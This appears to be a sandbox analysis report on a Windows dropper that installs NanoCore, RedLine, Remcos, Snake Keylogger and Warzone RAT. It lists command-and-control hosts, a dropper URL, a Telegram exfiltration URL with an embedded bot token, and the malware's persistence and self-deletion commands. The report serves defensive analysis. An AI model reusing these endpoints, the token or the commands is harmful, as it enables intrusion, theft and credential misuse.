nanocore | 188e97ba18d7394cb3949e66c8aeb062e3ea8675371d0ee2b5126b52366530ae

max time kernel
7s
max time network
279s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
07-06-2023 18:26

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

a.exe
Size

5KB
MD5

8ce1f6882edc51f701bbe648e40dd133
SHA1

496b3df4657e9d11df14a8ad267061d97249b511
SHA256

188e97ba18d7394cb3949e66c8aeb062e3ea8675371d0ee2b5126b52366530ae
SHA512

5826ea307fa12db5a8005fae8758314c0810e956ead3504fda7cadaccdbe737d609dfdfdc51996ab2eb350eae20398f8fbb97b16aa01f2af373c1ba20767d7d6
SSDEEP

48:6jtGAK8lb9ivcfaFSfkQLJhyPFlL8thCb/IExQpwOulavTqXSfbNtm:OI0iUaakQqDgtmQpmsvNzNt

Score

10^/10

nanocore redline remcos snakekeylogger warzonerat diza remotehost sheron evasion infostealer keylogger persistence rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://transparenciacanaa.com.br/cidadejunina/js/vendor/debug2.ps1

Extracted

Family

redline

Botnet

diza

83.97.73.129:19068

Attributes

auth_value
0d09b419c8bc967f91c68be4a17e92ee

Extracted

Family

redline

Botnet

sheron

83.97.73.129:19068

Attributes

auth_value
2d067e7e2372227d3a03b335260112e9

Extracted

Family

remcos

Botnet

RemoteHost

pekonomia.duckdns.org:30861

127.0.0.1:55433

185.65.134.166:55433

10.11.0.5:55433

45.128.234.54:55433

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-B0VP4N
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
Remcos
take_screenshot_option
false
take_screenshot_time
5

Extracted

Family

warzonerat

193.42.32.191:8282

Extracted

Family

nanocore

Version

1.2.2.0

ezemnia3.ddns.net:62335

91.193.75.178:62335

Mutex

954449b5-566c-46fe-92f0-8eb82a7f77b0

Attributes

activate_away_mode
true
backup_connection_host
91.193.75.178
backup_dns_server
8.8.4.4
buffer_size
65535
build_time
2023-01-23T18:14:17.620110936Z
bypass_user_account_control
true
bypass_user_account_control_data
clear_access_control
true
clear_zone_identifier
false
connect_delay
4000
connection_port
62335
default_group
Cashout
enable_debug_mode
true
gc_threshold
1.048576e+07
keep_alive_timeout
30000
keyboard_logging
false
lan_timeout
2500
max_packet_size
1.048576e+07
mutex
954449b5-566c-46fe-92f0-8eb82a7f77b0
mutex_timeout
5000
prevent_system_sleep
false
primary_connection_host
ezemnia3.ddns.net
primary_dns_server
8.8.8.8
request_elevation
true
restart_delay
5000
run_delay
0
run_on_startup
false
set_critical_process
true
timeout_interval
5000
use_custom_dns_server
false
version
1.2.2.0
wan_timeout
8000

Extracted

Family

snakekeylogger

https://api.telegram.org/bot6184780923:AAHbCGrBU_2zg9A-73yTyKKCMGf1tkzUFbM/sendMessage?chat_id=759814203

Signatures

NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 6 IoCs

resource	yara_rule
behavioral1/files/0x000800000001af58-160.dat	family_redline
behavioral1/files/0x000800000001af58-163.dat	family_redline
behavioral1/files/0x000600000001af63-177.dat	family_redline
behavioral1/memory/3500-172-0x0000000000120000-0x0000000000150000-memory.dmp	family_redline
behavioral1/files/0x000600000001af63-532.dat	family_redline
behavioral1/files/0x000600000001af63-533.dat	family_redline

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
stealer keylogger snakekeylogger

Snake Keylogger payload 1 IoCs

resource	yara_rule
behavioral1/memory/3724-488-0x0000000000400000-0x000000000041E000-memory.dmp	family_snakekeylogger

WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat

Warzone RAT payload 4 IoCs

rat

resource	yara_rule
behavioral1/memory/4652-334-0x0000000000400000-0x0000000000554000-memory.dmp	warzonerat
behavioral1/memory/4652-340-0x0000000000400000-0x0000000000554000-memory.dmp	warzonerat
behavioral1/memory/4652-346-0x0000000000400000-0x0000000000554000-memory.dmp	warzonerat
behavioral1/memory/4652-505-0x0000000000400000-0x0000000000554000-memory.dmp	warzonerat

Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 13 IoCs

pid	Process
2772	foto124.exe
3932	x1439100.exe
4480	fotod25.exe
4128	x2690896.exe
3508	game.exe
3500	f0109069.exe
3452	y3042868.exe
3836	y8418428.exe
4812	y4059719.exe
4676	j0684487.exe
4988	dot.exe
4032	metro.exe
4344	sonne.exe

Adds Run key to start application 2 TTPs 14 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	x2690896.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	y3042868.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	y8418428.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\""	y8418428.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	foto124.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	fotod25.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	x2690896.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	y3042868.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	y4059719.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup6 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP006.TMP\\\""	y4059719.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	x1439100.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	x1439100.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	fotod25.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	foto124.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
331	ipinfo.io
70	checkip.dyndns.org
316	ip-api.com
328	ipinfo.io

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 3508 set thread context of 4784	3508	game.exe	79
PID 4676 set thread context of 4788	4676	j0684487.exe	81
PID 4032 set thread context of 4876	4032	metro.exe	91

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2944	sc.exe
7348	sc.exe
8512	sc.exe
8784	sc.exe
3868	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 15 IoCs

pid	pid_target	Process	procid_target
4936	4676	WerFault.exe	77
4348	3508	WerFault.exe	73
3228	4032	WerFault.exe	85
5024	3724	WerFault.exe	127
2352	1800	WerFault.exe	171
596	5672	WerFault.exe	183
5280	5772	WerFault.exe	184
7524	1540	WerFault.exe	175
7348	6592	WerFault.exe	268
7728	7068	WerFault.exe	289
6604	7068	WerFault.exe	289
4980	6464	WerFault.exe	285
5492	2288	WerFault.exe	26
3500	6356	WerFault.exe	265
216	2288	WerFault.exe	26

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral1/files/0x000800000001af7c-423.dat	nsis_installer_1
behavioral1/files/0x000800000001af7c-423.dat	nsis_installer_2

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3800	schtasks.exe
6264	schtasks.exe
6312	schtasks.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
3752	tasklist.exe

GoLang User-Agent 9 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	609	Go-http-client/1.1
HTTP User-Agent header	633	Go-http-client/1.1
HTTP User-Agent header	333	Go-http-client/1.1
HTTP User-Agent header	375	Go-http-client/1.1
HTTP User-Agent header	392	Go-http-client/1.1
HTTP User-Agent header	617	Go-http-client/1.1
HTTP User-Agent header	329	Go-http-client/1.1
HTTP User-Agent header	351	Go-http-client/1.1
HTTP User-Agent header	383	Go-http-client/1.1

Kills process with taskkill 1 IoCs

evasion

pid	Process
5328	taskkill.exe

Runs net.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
4976	PING.EXE
6884	PING.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4784	AppLaunch.exe
4784	AppLaunch.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2096	a.exe
Token: SeDebugPrivilege	4784	AppLaunch.exe

Suspicious use of WriteProcessMemory 53 IoCs

description	pid	Process	procid_target
PID 2096 wrote to memory of 2772	2096	a.exe	67
PID 2096 wrote to memory of 2772	2096	a.exe	67
PID 2096 wrote to memory of 2772	2096	a.exe	67
PID 2772 wrote to memory of 3932	2772	foto124.exe	68
PID 2772 wrote to memory of 3932	2772	foto124.exe	68
PID 2772 wrote to memory of 3932	2772	foto124.exe	68
PID 2096 wrote to memory of 4480	2096	a.exe	69
PID 2096 wrote to memory of 4480	2096	a.exe	69
PID 2096 wrote to memory of 4480	2096	a.exe	69
PID 3932 wrote to memory of 4128	3932	x1439100.exe	70
PID 3932 wrote to memory of 4128	3932	x1439100.exe	70
PID 3932 wrote to memory of 4128	3932	x1439100.exe	70
PID 2096 wrote to memory of 3508	2096	a.exe	73
PID 2096 wrote to memory of 3508	2096	a.exe	73
PID 2096 wrote to memory of 3508	2096	a.exe	73
PID 4128 wrote to memory of 3500	4128	x2690896.exe	72
PID 4128 wrote to memory of 3500	4128	x2690896.exe	72
PID 4128 wrote to memory of 3500	4128	x2690896.exe	72
PID 4480 wrote to memory of 3452	4480	fotod25.exe	71
PID 4480 wrote to memory of 3452	4480	fotod25.exe	71
PID 4480 wrote to memory of 3452	4480	fotod25.exe	71
PID 3452 wrote to memory of 3836	3452	y3042868.exe	75
PID 3452 wrote to memory of 3836	3452	y3042868.exe	75
PID 3452 wrote to memory of 3836	3452	y3042868.exe	75
PID 3836 wrote to memory of 4812	3836	y8418428.exe	76
PID 3836 wrote to memory of 4812	3836	y8418428.exe	76
PID 3836 wrote to memory of 4812	3836	y8418428.exe	76
PID 4812 wrote to memory of 4676	4812	y4059719.exe	77
PID 4812 wrote to memory of 4676	4812	y4059719.exe	77
PID 4812 wrote to memory of 4676	4812	y4059719.exe	77
PID 3508 wrote to memory of 4784	3508	game.exe	79
PID 3508 wrote to memory of 4784	3508	game.exe	79
PID 3508 wrote to memory of 4784	3508	game.exe	79
PID 3508 wrote to memory of 4784	3508	game.exe	79
PID 3508 wrote to memory of 4784	3508	game.exe	79
PID 4676 wrote to memory of 4788	4676	j0684487.exe	81
PID 4676 wrote to memory of 4788	4676	j0684487.exe	81
PID 4676 wrote to memory of 4788	4676	j0684487.exe	81
PID 4676 wrote to memory of 4788	4676	j0684487.exe	81
PID 2096 wrote to memory of 4988	2096	a.exe	82
PID 2096 wrote to memory of 4988	2096	a.exe	82
PID 4676 wrote to memory of 4788	4676	j0684487.exe	81
PID 2096 wrote to memory of 4032	2096	a.exe	85
PID 2096 wrote to memory of 4032	2096	a.exe	85
PID 2096 wrote to memory of 4032	2096	a.exe	85
PID 2096 wrote to memory of 4344	2096	a.exe	87
PID 2096 wrote to memory of 4344	2096	a.exe	87
PID 2096 wrote to memory of 4344	2096	a.exe	87
PID 4032 wrote to memory of 4876	4032	metro.exe	91
PID 4032 wrote to memory of 4876	4032	metro.exe	91
PID 4032 wrote to memory of 4876	4032	metro.exe	91
PID 4032 wrote to memory of 4876	4032	metro.exe	91
PID 4032 wrote to memory of 4876	4032	metro.exe	91

C:\Users\Admin\AppData\Local\Temp\a.exe
"C:\Users\Admin\AppData\Local\Temp\a.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2096
- C:\Users\Admin\AppData\Local\Temp\a\foto124.exe
  "C:\Users\Admin\AppData\Local\Temp\a\foto124.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:2772
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x1439100.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x1439100.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:3932
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\x2690896.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\x2690896.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:4128
    - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\f0109069.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\f0109069.exe
        5⤵
        Executes dropped EXE
        
        PID:3500
    - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\g3375664.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\g3375664.exe
        5⤵
        
        PID:4972
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\h7573131.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\h7573131.exe
      4⤵
      PID:2724
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\i8591149.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\i8591149.exe
    3⤵
    PID:1800
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      4⤵
      PID:4244
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 572
      4⤵
      Program crash
      PID:2352
- C:\Users\Admin\AppData\Local\Temp\a\fotod25.exe
  "C:\Users\Admin\AppData\Local\Temp\a\fotod25.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:4480
- - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\y3042868.exe
    C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\y3042868.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:3452
  - - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\y8418428.exe
      C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\y8418428.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:3836
    - - C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\y4059719.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\y4059719.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:4812
      - C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\j0684487.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\j0684487.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:4676
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        7⤵
        
        PID:4788
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 596
        7⤵
        Program crash
        
        PID:4936
      - C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\k6688815.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\k6688815.exe
        6⤵
        
        PID:4260
    - - C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\l2840142.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\l2840142.exe
        5⤵
        
        PID:1812
- C:\Users\Admin\AppData\Local\Temp\a\game.exe
  "C:\Users\Admin\AppData\Local\Temp\a\game.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:3508
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4784
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3508 -s 240
    3⤵
    - Program crash
    PID:4348
- C:\Users\Admin\AppData\Local\Temp\a\dot.exe
  "C:\Users\Admin\AppData\Local\Temp\a\dot.exe"
  2⤵
  - Executes dropped EXE
  PID:4988
- C:\Users\Admin\AppData\Local\Temp\a\metro.exe
  "C:\Users\Admin\AppData\Local\Temp\a\metro.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4032
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:4876
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 128
    3⤵
    - Program crash
    PID:3228
- C:\Users\Admin\AppData\Local\Temp\a\sonne.exe
  "C:\Users\Admin\AppData\Local\Temp\a\sonne.exe"
  2⤵
  - Executes dropped EXE
  PID:4344
- - C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
    "C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe"
    3⤵
    PID:4824
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN lamod.exe /TR "C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe" /F
      4⤵
      Creates scheduled task(s)
      PID:3800
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "lamod.exe" /P "Admin:N"&&CACLS "lamod.exe" /P "Admin:R" /E&&echo Y|CACLS "..\a9e2a16078" /P "Admin:N"&&CACLS "..\a9e2a16078" /P "Admin:R" /E&&Exit
      4⤵
      PID:1580
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:164
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "lamod.exe" /P "Admin:N"
        5⤵
        
        PID:200
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "lamod.exe" /P "Admin:R" /E
        5⤵
        
        PID:2148
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\a9e2a16078" /P "Admin:N"
        5⤵
        
        PID:3208
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:2116
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\a9e2a16078" /P "Admin:R" /E
        5⤵
        
        PID:3680
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
      4⤵
      PID:5156
- C:\Users\Admin\AppData\Local\Temp\a\cleanmgr.exe
  "C:\Users\Admin\AppData\Local\Temp\a\cleanmgr.exe"
  2⤵
  PID:1504
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
    3⤵
    PID:5572
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\wuslxducoaiedcic"
      4⤵
      PID:3192
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\hwyeyvfwkiajoregjjc"
      4⤵
      PID:2256
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\jqlpzoqxyqsoqxskstwtwk"
      4⤵
      PID:6080
- C:\Users\Admin\AppData\Local\Temp\a\combo.exe
  "C:\Users\Admin\AppData\Local\Temp\a\combo.exe"
  2⤵
  PID:4044
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "combo" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\EsetSecurity\combo.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\a\combo.exe" &&START "" "C:\Users\Admin\AppData\Local\EsetSecurity\combo.exe"
    3⤵
    PID:5080
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:2488
  - - C:\Windows\system32\PING.EXE
      ping 127.0.0.1
      4⤵
      Runs ping.exe
      PID:4976
- C:\Users\Admin\AppData\Local\Temp\a\HH.exe
  "C:\Users\Admin\AppData\Local\Temp\a\HH.exe"
  2⤵
  PID:3132
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:3704
- C:\Users\Admin\AppData\Local\Temp\a\SS.exe
  "C:\Users\Admin\AppData\Local\Temp\a\SS.exe"
  2⤵
  PID:2652
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:4652
- C:\Users\Admin\AppData\Local\Temp\a\nevv.exe
  "C:\Users\Admin\AppData\Local\Temp\a\nevv.exe"
  2⤵
  PID:2172
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:3852
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:4100
- C:\Users\Admin\AppData\Local\Temp\a\pmCxohhd.exe
  "C:\Users\Admin\AppData\Local\Temp\a\pmCxohhd.exe"
  2⤵
  PID:4336
- - C:\Users\Admin\AppData\Local\Temp\a\pmCxohhd.exe
    C:\Users\Admin\AppData\Local\Temp\a\pmCxohhd.exe
    3⤵
    PID:2284
- C:\Users\Admin\AppData\Local\Temp\a\ghjkl.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ghjkl.exe"
  2⤵
  PID:520
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA==
    3⤵
    PID:5068
- - C:\Users\Admin\AppData\Local\Temp\Ixgzydftvdfqbldoxvzktk.exe
    "C:\Users\Admin\AppData\Local\Temp\Ixgzydftvdfqbldoxvzktk.exe"
    3⤵
    PID:5944
  - - C:\Users\Admin\AppData\Local\Temp\Ixgzydftvdfqbldoxvzktk.exe
      C:\Users\Admin\AppData\Local\Temp\Ixgzydftvdfqbldoxvzktk.exe
      4⤵
      PID:4628
- - C:\Users\Admin\AppData\Local\Temp\a\ghjkl.exe
    C:\Users\Admin\AppData\Local\Temp\a\ghjkl.exe
    3⤵
    PID:2336
- C:\Users\Admin\AppData\Local\Temp\a\wininit.exe
  "C:\Users\Admin\AppData\Local\Temp\a\wininit.exe"
  2⤵
  PID:1600
- C:\Users\Admin\AppData\Local\Temp\a\NA.exe
  "C:\Users\Admin\AppData\Local\Temp\a\NA.exe"
  2⤵
  PID:5088
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:3556
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:1888
- C:\Users\Admin\AppData\Local\Temp\a\BHHh.exe
  "C:\Users\Admin\AppData\Local\Temp\a\BHHh.exe"
  2⤵
  PID:4704
- C:\Users\Admin\AppData\Local\Temp\a\A.exe
  "C:\Users\Admin\AppData\Local\Temp\a\A.exe"
  2⤵
  PID:2528
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:3724
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 1520
      4⤵
      Program crash
      PID:5024
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:4680
- C:\Users\Admin\AppData\Local\Temp\a\BBHhHhB.exe
  "C:\Users\Admin\AppData\Local\Temp\a\BBHhHhB.exe"
  2⤵
  PID:204
- C:\Users\Admin\AppData\Local\Temp\a\HHGgG.exe
  "C:\Users\Admin\AppData\Local\Temp\a\HHGgG.exe"
  2⤵
  PID:1008
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:4808
- C:\Users\Admin\AppData\Local\Temp\a\G.exe
  "C:\Users\Admin\AppData\Local\Temp\a\G.exe"
  2⤵
  PID:3712
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\YYY.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\YYY.exe"
    3⤵
    PID:4284
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
      4⤵
      PID:3256
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 1 & Del "C:\Users\Admin\AppData\Local\Temp\a\G.exe"
    3⤵
    PID:860
  - - C:\Windows\SysWOW64\choice.exe
      choice /C Y /N /D Y /T 1
      4⤵
      PID:1092
- C:\Users\Admin\AppData\Local\Temp\a\BMKNJPO87.exe
  "C:\Users\Admin\AppData\Local\Temp\a\BMKNJPO87.exe"
  2⤵
  PID:1412
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:4680
- C:\Users\Admin\AppData\Local\Temp\a\H.exe
  "C:\Users\Admin\AppData\Local\Temp\a\H.exe"
  2⤵
  PID:3556
